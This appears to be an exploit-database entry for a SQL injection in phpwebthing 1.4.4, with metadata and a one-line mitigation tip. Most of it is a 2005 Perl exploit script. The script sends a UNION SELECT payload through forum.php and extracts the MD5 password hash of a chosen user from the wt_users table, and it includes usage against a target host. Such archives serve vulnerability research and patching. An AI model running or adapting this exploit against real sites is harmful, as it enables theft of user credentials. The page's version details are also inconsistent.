header-logo
Suggest Exploit
vendor:
phpwebthing
by:
Qptan & AhLam
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: phpwebthing
Affected Version From: 1.4.2004
Affected Version To: 1.4.2004
Patch Exists: YES
Related CWE: N/A
CPE: a:phpwebthing:phpwebthing:1.4.4
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2005

SQL injection in phpwebthing v 1.4.4

This exploit allows an attacker to inject malicious SQL queries into the vulnerable application. The exploit is coded in Perl and is used to retrieve the MD5 hash of the password of a given user ID from the phpwebthing v 1.4.4 application.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

#!/bin/bin/perl
#-----------------------------------------------------#
#-      SQL injection in phpwebthing v 1.4.4
#-      Founder by Qptan & Exploting by AhLam
#-      www.leZe.Com Only For Geek Hacker's
#-      coded by AhLaM  A.1.M|at|hotmail.com
#-      http://www.lezr.com/vb/showthread.php?t=6557
#-----------------------------------------------------#
use LWP::Simple;

print "\n============================================\n";
print "\n   SQL injection in phpwebthing v 1.4.4    =  ";
print "\n   Founder by Qptan & Exploting by AhLam   =  ";
print "\n   www.leZe.Com Only For Geek Hacker's     =  ";
print "\n   Coded By AhLaM   A.1.M|at|hotmail.com         ";
print "\n============================================\n";

if(!$ARGV[0] or !$ARGV[1]) {
 print "\nUsage:\nperl $0 [host] [User ID] \n\nExample:\nperl $0 http://www.target.com/ 1\n";
 exit(0);
}
$url = "/forum.php?forum=-1%20union%20select%20password,password,null,null%20from%20wt_users%20where%20uid=$ARGV[1]/*";
$page = get($ARGV[0].$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]\n";
$page =~ m/ - (.*?)<\/td>/ && print "[+] MD5 hash of password is: $1\n";
print "[-] Unable to retrieve hash of password\n" if(!$1);

# milw0rm.com [2005-11-16]